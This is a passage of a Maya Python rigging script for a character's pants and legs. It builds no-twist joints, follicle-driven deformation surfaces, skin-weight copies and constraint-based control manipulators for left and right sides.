\"%s.rz\" % upperlegNt[0])\n mc.connectAttr(\"%s.rz\" % upperleg, \"%s.input[0]\" % blender4)\n mc.connectAttr(\"%s.rz\" % upperlegNt[0], \"%s.input[1]\" % blender4)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl4, side), \"%s.ab\" % blender4, f=True)\n\n # hip\n\n def hipNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n hp = (\"%s_leg_01_base_twist\" % side)\n\n # refer to attribute control\n attrControl5 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n hpNt = mc.duplicate(hp, n=\"%s_leg_01_base_no_twist\" % side)\n\n # refer to hip\n hip5 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender5 = mc.createNode(\"blendTwoAttr\", n=\"%s_hip_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip5, \"%s.rz\" % hpNt[0])\n mc.connectAttr(\"%s.rz\" % hp, \"%s.input[0]\" % blender5)\n mc.connectAttr(\"%s.rz\" % hpNt[0], \"%s.input[1]\" % blender5)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl5, side), \"%s.ab\" % blender5, f=True)\n\n #######################################\n\n # duplicate NURBS surfaces\n\n def surfaceDuplicate(side, section):\n\n import maya.cmds as mc\n\n surface = (\"%s_leg_%s_deform_ns\" % (side, section))\n\n noTwistJnts = [\"%s_leg_%s_base_no_twist\" % (side, section),\n \"%s_leg_%s_bend_no_twist\" % (side, section),\n \"%s_leg_%s_tip_no_twist\" % (side, section)]\n\n surfaceNt = mc.duplicate(surface, n=\"%s_no_twist\" % surface)\n\n mc.skinCluster(noTwistJnts[0],\n noTwistJnts[1],\n noTwistJnts[2],\n surfaceNt[0], n=\"%s_sc\" % surfaceNt[0], tsb=True)\n\n skinClusterSource = mc.ls(mc.listHistory(surface, pdo=True), type='skinCluster')\n newSkincluster = mc.ls(mc.listHistory(surfaceNt[0], pdo=True), type='skinCluster')\n cvs = mc.ls('%s.cv[*][*]' % surface, fl=True)\n for cv in cvs:\n skinWeights = mc.skinPercent(skinClusterSource[0], cv, query=True, value=True)\n newCv = cv.replace(surface, surfaceNt[0])\n mc.skinPercent(newSkincluster[0], newCv, transformValue=[(noTwistJnts[0], skinWeights[0]),\n (noTwistJnts[1], skinWeights[1]),\n (noTwistJnts[2], skinWeights[2])])\n\n #######################################\n\n # follicle maker\n\n def legsfollicles(side, section):\n\n import maya.cmds as mc\n\n # list important objects\n constantName = (\"%s_leg_%s_deform\" % (side, section))\n legSwitch = (\"%s_leg_SW_ctrl\" % 
side)\n deformGRP = (\"%s_leg_%s_deform_grp\" % (side, section))\n surface = (\"%s_ns_no_twist\" % constantName)\n\n # first transformGeometry\n tg0 = mc.createNode(\"transformGeometry\", n=\"%s_tg0\" % surface)\n mc.connectAttr(\"%sShape.local\" % surface, \"%s.ig\" % tg0, )\n mc.connectAttr(\"%s.wim\" % deformGRP, \"%s.txf\" % tg0)\n\n # first curveFromSurfaceIso\n cfsi0 = mc.createNode(\"curveFromSurfaceIso\", n=\"%s_cfsi0\" % surface)\n mc.connectAttr(\"%s.og\" % tg0, \"%s.is\" % cfsi0)\n mc.setAttr(\"%s.minValue\" % cfsi0, 0)\n mc.setAttr(\"%s.maxValue\" % cfsi0, 1)\n\n # second curveFromSurfaceIso\n cfsi1 = mc.createNode(\"curveFromSurfaceIso\", n=\"%s_cfsi1\" % surface)\n mc.connectAttr(\"%s.og\" % tg0, \"%s.is\" % cfsi1)\n mc.setAttr(\"%s.minValue\" % cfsi1, 0)\n mc.setAttr(\"%s.maxValue\" % cfsi1, 1)\n mc.setAttr(\"%s.iv\" % cfsi1, 1)\n\n # first rebuildCurve\n rc0 = mc.createNode(\"rebuildCurve\", n=\"%s_rc0\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi0, \"%s.ic\" % rc0)\n mc.setAttr(\"%s.keepRange\" % rc0, 0)\n\n # second rebuildCurve\n rc1 = mc.createNode(\"rebuildCurve\", n=\"%s_rc1\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi1, \"%s.ic\" % rc1)\n mc.setAttr(\"%s.keepRange\" % rc1, 0)\n\n # evenspread switch\n essw = mc.createNode(\"blendTwoAttr\", n=\"%s_essw\" % surface)\n mc.connectAttr(\"%s.evenspread\" % deformGRP, \"%s.ab\" % essw)\n mc.setAttr(\"%s.i[0]\" % essw, 1)\n\n # first avgCurves\n ac0 = mc.createNode(\"avgCurves\", n=\"%s_ac0\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi0, \"%s.ic1\" % ac0)\n mc.connectAttr(\"%s.oc\" % rc0, \"%s.ic2\" % ac0)\n mc.connectAttr(\"%s.o\" % essw, \"%s.w1\" % ac0)\n mc.connectAttr(\"%s.evenspread\" % deformGRP, \"%s.w2\" % ac0)\n mc.setAttr(\"%s.automaticWeight\" % ac0, 0)\n\n # second avgCurves\n ac1 = mc.createNode(\"avgCurves\", n=\"%s_ac1\" % surface)\n mc.connectAttr(\"%s.oc\" % cfsi1, \"%s.ic1\" % ac1)\n mc.connectAttr(\"%s.oc\" % rc1, \"%s.ic2\" % ac1)\n mc.connectAttr(\"%s.o\" % essw, \"%s.w1\" % ac1)\n mc.connectAttr(\"%s.evenspread\" % deformGRP, \"%s.w2\" % ac1)\n mc.setAttr(\"%s.automaticWeight\" % ac1, 0)\n\n # loft\n loft = mc.createNode(\"loft\", n=\"%s_loft\" % surface)\n mc.connectAttr(\"%s.oc\" % ac0, \"%s.ic[0]\" % loft)\n mc.connectAttr(\"%s.oc\" % ac1, \"%s.ic[1]\" % loft)\n mc.setAttr(\"%s.uniform\" % loft, 1)\n mc.setAttr(\"%s.autoReverse\" % loft, 0)\n mc.setAttr(\"%s.reverseSurfaceNormals\" % loft, 1)\n\n # second transformGeometry\n tg1 = mc.createNode(\"transformGeometry\", n=\"%s_tg1\" % surface)\n mc.connectAttr(\"%s.os\" % loft, \"%s.ig\" % tg1, )\n mc.connectAttr(\"%s.wm[0]\" % deformGRP, \"%s.txf\" % tg1)\n\n # --------------------------\n\n # follicles\n\n # first follicle\n fol1 = mc.createNode(\"follicle\", n=\"%s_att_01Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol1)\n mc.connectAttr(\"%s.outRotate\" % fol1, \"%s_att_01.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol1, \"%s_att_01.t\" % surface)\n mc.parent(\"%s_att_01\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol1, 0.125)\n mc.setAttr(\"%s.parameterV\" % fol1, 0.5)\n mc.setAttr(\"%s_att_01.inheritsTransform\" % surface, 0)\n\n # second follicle\n fol2 = mc.createNode(\"follicle\", n=\"%s_att_02Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol2)\n mc.connectAttr(\"%s.outRotate\" % fol2, \"%s_att_02.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol2, \"%s_att_02.t\" % surface)\n mc.parent(\"%s_att_02\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol2, 0.375)\n 
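# NOTE: the four follicles in this function are pinned at parameterU = 0.125, 0.375, 0.625 and 0.875 (evenly spaced quarters along the lofted strip), while parameterV stays at 0.5, the surface centerline.\n 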
mc.setAttr(\"%s.parameterV\" % fol2, 0.5)\n mc.setAttr(\"%s_att_02.inheritsTransform\" % surface, 0)\n\n # third follicle\n fol3 = mc.createNode(\"follicle\", n=\"%s_att_03Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol3)\n mc.connectAttr(\"%s.outRotate\" % fol3, \"%s_att_03.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol3, \"%s_att_03.t\" % surface)\n mc.parent(\"%s_att_03\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol3, 0.625)\n mc.setAttr(\"%s.parameterV\" % fol3, 0.5)\n mc.setAttr(\"%s_att_03.inheritsTransform\" % surface, 0)\n\n # fourth follicle\n fol4 = mc.createNode(\"follicle\", n=\"%s_att_04Shape\" % surface)\n mc.connectAttr(\"%s.og\" % tg1, \"%s.is\" % fol4)\n mc.connectAttr(\"%s.outRotate\" % fol4, \"%s_att_04.r\" % surface)\n mc.connectAttr(\"%s.outTranslate\" % fol4, \"%s_att_04.t\" % surface)\n mc.parent(\"%s_att_04\" % surface, deformGRP)\n mc.setAttr(\"%s.parameterU\" % fol4, 0.875)\n mc.setAttr(\"%s.parameterV\" % fol4, 0.5)\n mc.setAttr(\"%s_att_04.inheritsTransform\" % surface, 0)\n\n # --------------------------\n\n # post follicle actions\n\n # first orig joint\n jntOrig1 = mc.duplicate(\"%s_leg_%s_deform_SKN_01_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_01_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig1[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig1[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig1[0], 0)\n jnt1 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_01\" % (side, section))\n mc.parent(jnt1, jntOrig1[0], r=True)\n mc.select(cl=True)\n jntCtrl1 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_01\" % (side, section))\n mc.parent(jntCtrl1, jntOrig1[0], r=True)\n mc.parent(jntOrig1[0], \"%s_att_01\" % surface, r=True)\n mc.parent(jntOrig1[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig1[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt1, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl1, 2)\n\n # first multMatrix\n mm1 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_01_mm\" % (side, section))\n mc.connectAttr(\"%s_att_01.m\" % surface, \"%s.i[0]\" % mm1)\n mc.connectAttr(\"%s.pim\" % jntOrig1[0], \"%s.i[1]\" % mm1)\n\n # first decomposeMatrix\n dm1 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_01_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm1, \"%s.inputMatrix\" % dm1)\n mc.connectAttr(\"%s.outputRotate\" % dm1, \"%s.r\" % jntOrig1[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm1, \"%s.t\" % jntOrig1[0])\n mc.setAttr(\"%s.jo\" % jntOrig1[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl1, \"%s.t\" % jnt1)\n mc.connectAttr(\"%s.r\" % jntCtrl1, \"%s.r\" % jnt1)\n mc.connectAttr(\"%s.s\" % jntCtrl1, \"%s.s\" % jnt1)\n mc.connectAttr(\"%s.ro\" % jntCtrl1, \"%s.ro\" % jnt1)\n\n # second orig joint\n jntOrig2 = mc.duplicate(\"%s_leg_%s_deform_SKN_02_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_02_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig2[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig2[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig2[0], 0)\n jnt2 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_02\" % (side, section))\n mc.parent(jnt2, jntOrig2[0], r=True)\n mc.select(cl=True)\n jntCtrl2 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_02\" % (side, section))\n mc.parent(jntCtrl2, jntOrig2[0], r=True)\n mc.parent(jntOrig2[0], \"%s_att_02\" % surface, r=True)\n mc.parent(jntOrig2[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig2[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt2, 2)\n 
mc.setAttr(\"%s.drawStyle\" % jntCtrl2, 2)\n\n # second multMatrix\n mm2 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_02_mm\" % (side, section))\n mc.connectAttr(\"%s_att_02.m\" % surface, \"%s.i[0]\" % mm2)\n mc.connectAttr(\"%s.pim\" % jntOrig2[0], \"%s.i[1]\" % mm2)\n\n # second decomposeMatrix\n dm2 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_02_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm2, \"%s.inputMatrix\" % dm2)\n mc.connectAttr(\"%s.outputRotate\" % dm2, \"%s.r\" % jntOrig2[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm2, \"%s.t\" % jntOrig2[0])\n mc.setAttr(\"%s.jo\" % jntOrig2[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl2, \"%s.t\" % jnt2)\n mc.connectAttr(\"%s.r\" % jntCtrl2, \"%s.r\" % jnt2)\n mc.connectAttr(\"%s.s\" % jntCtrl2, \"%s.s\" % jnt2)\n mc.connectAttr(\"%s.ro\" % jntCtrl2, \"%s.ro\" % jnt2)\n\n # third orig joint\n jntOrig3 = mc.duplicate(\"%s_leg_%s_deform_SKN_03_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_03_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig3[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig3[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig3[0], 0)\n jnt3 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_03\" % (side, section))\n mc.parent(jnt3, jntOrig3[0], r=True)\n mc.select(cl=True)\n jntCtrl3 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_03\" % (side, section))\n mc.parent(jntCtrl3, jntOrig3[0], r=True)\n mc.parent(jntOrig3[0], \"%s_att_03\" % surface, r=True)\n mc.parent(jntOrig3[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig3[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt3, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl3, 2)\n\n # third multMatrix\n mm3 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_03_mm\" % (side, section))\n mc.connectAttr(\"%s_att_03.m\" % surface, \"%s.i[0]\" % mm3)\n mc.connectAttr(\"%s.pim\" % jntOrig3[0], \"%s.i[1]\" % mm3)\n\n # third decomposeMatrix\n dm3 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_03_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm3, \"%s.inputMatrix\" % dm3)\n mc.connectAttr(\"%s.outputRotate\" % dm3, \"%s.r\" % jntOrig3[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm3, \"%s.t\" % jntOrig3[0])\n mc.setAttr(\"%s.jo\" % jntOrig3[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl3, \"%s.t\" % jnt3)\n mc.connectAttr(\"%s.r\" % jntCtrl3, \"%s.r\" % jnt3)\n mc.connectAttr(\"%s.s\" % jntCtrl3, \"%s.s\" % jnt3)\n mc.connectAttr(\"%s.ro\" % jntCtrl3, \"%s.ro\" % jnt3)\n\n # fourth orig joint\n jntOrig4 = mc.duplicate(\"%s_leg_%s_deform_SKN_04_orig\" % (side, section), po=True,\n n=\"%s_leg_%s_no_twist_SKN_04_orig\" % (side, section), ic=False)\n mc.setAttr(\"%s.v\" % jntOrig4[0], k=True, cb=True, l=False)\n mc.setAttr(\"%s.v\" % jntOrig4[0], 1)\n mc.setAttr(\"%s.ds\" % jntOrig4[0], 0)\n jnt4 = mc.joint(n=\"%s_leg_%s_no_twist_SKN_04\" % (side, section))\n mc.parent(jnt4, jntOrig4[0], r=True)\n mc.select(cl=True)\n jntCtrl4 = mc.joint(n=\"%s_leg_%s_no_twist_ctrl_04\" % (side, section))\n mc.parent(jntCtrl4, jntOrig4[0], r=True)\n mc.parent(jntOrig4[0], \"%s_att_04\" % surface, r=True)\n mc.parent(jntOrig4[0], deformGRP)\n mc.setAttr(\"%s.drawStyle\" % jntOrig4[0], 2)\n mc.setAttr(\"%s.drawStyle\" % jnt4, 2)\n mc.setAttr(\"%s.drawStyle\" % jntCtrl4, 2)\n\n # fourth multMatrix\n mm4 = mc.createNode(\"multMatrix\", n=\"%s_leg_%s_no_twist_SKN_04_mm\" % (side, section))\n mc.connectAttr(\"%s_att_04.m\" % surface, \"%s.i[0]\" % mm4)\n 
mc.connectAttr(\"%s.pim\" % jntOrig4[0], \"%s.i[1]\" % mm4)\n\n # fourth decomposeMatrix\n dm4 = mc.createNode(\"decomposeMatrix\", n=\"%s_leg_%s_no_twist_SKN_04_dm\" % (side, section))\n mc.connectAttr(\"%s.o\" % mm4, \"%s.inputMatrix\" % dm4)\n mc.connectAttr(\"%s.outputRotate\" % dm4, \"%s.r\" % jntOrig4[0])\n mc.connectAttr(\"%s.outputTranslate\" % dm4, \"%s.t\" % jntOrig4[0])\n mc.setAttr(\"%s.jo\" % jntOrig4[0], 0, 0, 0)\n\n # connect joints accordingly\n mc.connectAttr(\"%s.t\" % jntCtrl4, \"%s.t\" % jnt4)\n mc.connectAttr(\"%s.r\" % jntCtrl4, \"%s.r\" % jnt4)\n mc.connectAttr(\"%s.s\" % jntCtrl4, \"%s.s\" % jnt4)\n mc.connectAttr(\"%s.ro\" % jntCtrl4, \"%s.ro\" % jnt4)\n\n # no twist thight joints\n\n def thighJnts(side):\n\n import maya.cmds as mc\n\n # refer to the no roll attribute control\n attrCtrl = \"%s_leg_SW_ctrl\" % side\n rev = mc.createNode(\"reverse\", n=\"%s_leg_01_no_twist_rev\" % side)\n mc.connectAttr(\"%s.%s_nr\" % (attrCtrl, side), \"%s.ix\" % rev)\n\n # refer to thigh joints\n jnt1 = (\"%s_leg_01_deform_ctrl_01\" % side)\n jnt2 = (\"%s_leg_01_deform_ctrl_02\" % side)\n jnt3 = (\"%s_leg_01_deform_ctrl_03\" % side)\n jnt4 = (\"%s_leg_01_deform_ctrl_04\" % side)\n\n # refer to thigh nt joints\n ntjnt1 = (\"%s_leg_01_no_twist_ctrl_01\" % side)\n ntjnt2 = (\"%s_leg_01_no_twist_ctrl_02\" % side)\n ntjnt3 = (\"%s_leg_01_no_twist_ctrl_03\" % side)\n ntjnt4 = (\"%s_leg_01_no_twist_ctrl_04\" % side)\n\n # controls\n tempCrcl1 = mc.circle(n=\"%s_tempCircle1\" % side)\n mc.delete(tempCrcl1, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl1[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl1[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl1[0], ntjnt1, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl1[0])\n\n oriConst1 = mc.orientConstraint(jnt1, ntjnt1, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst1[0])\n\n tempCrcl2 = mc.circle(n=\"%s_tempCircle2\" % side)\n mc.delete(tempCrcl2, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl2[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl2[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl2[0], ntjnt2, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl2[0])\n\n oriConst2 = mc.orientConstraint(jnt2, ntjnt2, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst2[0])\n\n tempCrcl3 = mc.circle(n=\"%s_tempCircle3\" % side)\n mc.delete(tempCrcl3, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl3[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl3[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl3[0], ntjnt3, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl3[0])\n\n oriConst3 = mc.orientConstraint(jnt3, ntjnt3, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst3[0])\n\n tempCrcl4 = mc.circle(n=\"%s_tempCircle4\" % side)\n mc.delete(tempCrcl4, ch=True)\n mc.rotate(90, 0, 0, \"%s.cv[0:9]\" % tempCrcl4[0], r=1)\n mc.scale(1.2, .6, .3, \"%s.cv[0:9]\" % tempCrcl4[0], r=1)\n mc.parent(\"%sShape\" % tempCrcl4[0], ntjnt4, s=True, r=True)\n mc.select(cl=True)\n mc.delete(tempCrcl4[0])\n\n oriConst4 = mc.orientConstraint(jnt4, ntjnt4, mo=True)\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w0\" % oriConst4[0])\n\n theSet = mc.sets(ntjnt1, ntjnt2, ntjnt3, ntjnt4, n=\"%s_thigh_NoTwistJoints_skin_set\" % side)\n mc.sets(theSet, add=\"skin_set\")\n\n #######################################\n ############ Manipulators #############\n #######################################\n\n # right side top pivots' proper orientation\n\n def topPivotOrient(number):\n\n import 
maya.cmds as mc\n\n pivotControl = (\"R_pants_0%s_pivot_top_ctrl\" % number)\n pantsControl = mc.listRelatives(pivotControl, c=True, type=\"transform\")\n pivotControlTopGrp = mc.listRelatives(\"%s_orig\" % pivotControl, p=True, )\n\n mc.parent(pantsControl[0], w=True)\n\n mc.parent(\"%s_orig\" % pivotControl, w=True)\n\n mc.setAttr(\"%s_orig.scale\" % pivotControl, -1, -1, -1)\n\n mc.parent(pantsControl, pivotControl)\n mc.parent(\"%s_orig\" % pivotControl, \"%s\" % pivotControlTopGrp[0])\n\n # right side main controls' proper orientation\n\n def rightSideOrient(number):\n\n import maya.cmds as mc\n\n controller = (\"R_pants_0%s_ctrl\" % number)\n\n kids = mc.listRelatives(controller, c=True, type='transform')\n mc.parent(kids, w=True)\n mc.setAttr('%s_orig.scale' % controller, -1, -1, 1)\n mc.parent(kids, controller)\n for kid in kids:\n mc.setAttr('%s.scale' % kid, -1, -1, 1)\n\n # fix size of fifth ring\n\n def fix5thRing(side):\n\n import maya.cmds as mc\n\n ring = (\"%s_pants_05_ctrl\" % side)\n\n mc.scale(.75, .75, .75, \"%s.cv[0:9]\" % ring)\n\n # reparent viz controls for the pantss\n\n def vcReparent(side):\n\n import maya.cmds as mc\n\n ctrl = (\"%s_pants_top_pivot_attr_ctrl_orig\" % side)\n\n mc.parent(ctrl, \"%s_leg_02_no_twist_SKN_04_orig\" % side)\n\n # Connect Manips to the follicles\n\n def parentManips(side):\n\n import maya.cmds as mc\n\n blendelbFrnt = \"%s_kneeFrnt_twist_choice_bta\" % side\n blendfrleg = \"%s_foreleg_twist_choice_bta\" % side\n blendankle = \"%s_ankle_twist_choice_bta\" % side\n\n attrControl = \"%s_leg_SW_ctrl\" % side\n rev = mc.createNode(\"reverse\", n=\"%s_leg_02_no_twist_rev\" % side)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.ix\" % rev)\n\n ntJnt1 = \"%s_leg_02_no_twist_ctrl_01\" % side\n ntJnt2 = \"%s_leg_02_no_twist_ctrl_02\" % side\n ntJnt3 = \"%s_leg_02_no_twist_ctrl_03\" % side\n ntJnt4 = \"%s_leg_02_no_twist_ctrl_04\" % side\n\n Jnt1 = \"%s_leg_02_deform_ctrl_01\" % side\n Jnt2 = \"%s_leg_02_deform_ctrl_02\" % side\n Jnt3 = \"%s_leg_02_deform_ctrl_03\" % side\n Jnt4 = \"%s_leg_02_deform_ctrl_04\" % side\n\n svl1 = \"%s_pants_01_pivot_top_ctrl\" % side\n svl2 = \"%s_pants_02_pivot_top_ctrl\" % side\n svl3 = \"%s_pants_03_pivot_top_ctrl\" % side\n svl4 = \"%s_pants_04_pivot_top_ctrl\" % side\n svl5 = \"%s_pants_05_pivot_top_ctrl\" % side\n\n knee = mc.duplicate(\"%s_leg_02\" % side, n=\"%s_leg_02_no_twist\" % side, po=True)\n mc.parent(knee[0], \"%s_leg_02\" % side)\n tempOriConst = mc.orientConstraint(ntJnt4, knee[0])\n mc.delete(tempOriConst)\n\n tempConst1 = mc.pointConstraint(ntJnt4, \"%s_orig\" % svl1, sk=(\"y\", \"z\"))\n mc.delete(tempConst1)\n tempConst2 = mc.pointConstraint(ntJnt3, \"%s_orig\" % svl2, sk=(\"y\", \"z\"))\n mc.delete(tempConst2)\n tempConst3 = mc.pointConstraint(ntJnt2, \"%s_orig\" % svl3, sk=(\"y\", \"z\"))\n mc.delete(tempConst3)\n tempConst4 = mc.pointConstraint(ntJnt1, \"%s_orig\" % svl4, sk=(\"y\", \"z\"))\n mc.delete(tempConst4)\n\n grp1 = mc.group(em=True, n=\"%s_transform\" % svl1, p=ntJnt4)\n tempConst5 = mc.pointConstraint(ntJnt4, grp1)\n mc.delete(tempConst5)\n oriCnst1 = mc.orientConstraint(ntJnt4, knee[0], grp1, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst1[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst1[0])\n mc.parent(\"%s_orig\" % svl1, grp1)\n\n grp5 = mc.group(em=True, n=\"%s_transform\" % svl5, p=ntJnt4)\n tempConst6 = mc.pointConstraint(ntJnt4, grp5, sk=\"x\")\n mc.delete(tempConst6)\n oriCnst2 = mc.orientConstraint(ntJnt4, knee[0], 
grp5, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst2[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst2[0])\n mc.parent(\"%s_orig\" % svl5, grp5)\n\n grp2 = mc.group(em=True, n=\"%s_transform\" % svl2, p=ntJnt3)\n tempConst7 = mc.pointConstraint(ntJnt3, grp2)\n mc.delete(tempConst7)\n oriCnst3 = mc.orientConstraint(ntJnt3, knee[0], grp2, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst3[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst3[0])\n mc.parent(\"%s_orig\" % svl2, grp2)\n\n grp3 = mc.group(em=True, n=\"%s_transform\" % svl3, p=ntJnt2)\n tempConst8 = mc.pointConstraint(ntJnt2, grp3)\n mc.delete(tempConst8)\n oriCnst4 = mc.orientConstraint(ntJnt2, knee[0], grp3, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst4[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst4[0])\n mc.parent(\"%s_orig\" % svl3, grp3)\n\n grp4 = mc.group(em=True, n=\"%s_transform\" % svl4, p=ntJnt1)\n tempConst9 = mc.pointConstraint(ntJnt1, grp4)\n mc.delete(tempConst9)\n oriCnst5 = mc.orientConstraint(ntJnt1, knee[0], grp4, mo=True)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.w0\" % oriCnst5[0])\n mc.connectAttr(\"%s.ox\" % rev, \"%s.w1\" % oriCnst5[0])\n mc.parent(\"%s_orig\" % svl4, grp4)\n\n #######################################\n ########## execute functions ##########\n #######################################\n\n # variables\n\n sides = [\"L\", \"R\"]\n sections = [\"01\", \"02\"]\n numbers = [\"1\", \"2\", \"3\", \"4\", \"5\"]\n\n ###No Roll\n\n # no twist joints\n for side in sides:\n ankleNoTwist(side)\n forelegNoTwist(side)\n kneeFrontNoTwist(side)\n kneeBackNoTwist(side)\n upperlegNoTwist(side)\n hipNoTwist(side)\n\n # duplicate NURBS surfaces\n for side in sides:\n for section in sections:\n surfaceDuplicate(side, section)\n\n # follicle maker\n for side in sides:\n for section in sections:\n legsfollicles(side, section)\n\n # thighs' controls\n for side in sides:\n thighJnts(side)\n\n ###Manipulators\n\n # right side proper orientation\n for number in numbers:\n topPivotOrient(number)\n rightSideOrient(number)\n\n # connect no roll to manipulators\n for side in sides:\n parentManips(side)\n vcReparent(side)\n\n # correction of the first ring on the right side\n mc.parent(\"R_pants_01_ctrl_orig\", w=True)\n mc.setAttr(\"R_pants_01_pivot_top_ctrl_orig.scale\", -1, -1, -1)\n mc.parent(\"R_pants_01_ctrl_orig\", \"R_pants_01_pivot_top_ctrl\")\n mc.move(0, -1.351013, 0, \"R_pants_01_pivot_top_ctrlShape.cv[0]\", os=True, r=True)\n mc.move(0, -1.351013, 0, \"R_pants_01_pivot_top_ctrlShape.cv[2:3]\", os=True, r=True)\n mc.move(0, -1.351013, 0, \"R_pants_01_pivot_top_ctrlShape.cv[5:9]\", os=True, r=True)\n\n # intermediate joints' proper orientation\n interms = mc.ls(\"R*interm*ctrl_orig\")\n\n for interm in interms:\n trnsfrms = mc.listRelatives(interm, p=True)\n for trnsfrm in trnsfrms:\n mc.setAttr('%s.rotate' % interm, 0, 180, 180)\n mc.setAttr('%s.scale' % interm, -1, 1, 1)\n\n # fix size of fifth ring\n for side in sides:\n fix5thRing(side)\n\n ######################## End\n\n pantsTemplate = (\"pants_ctrls_template\")\n\n if mc.objExists(pantsTemplate):\n\n main()\n\n else:\n\n pass","repo_name":"lapointea/patch","sub_path":"noRollPants/pantsPreBehavior.py","file_name":"pantsPreBehavior.py","file_ext":"py","file_size_in_byte":32590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42811582069","text":"from 
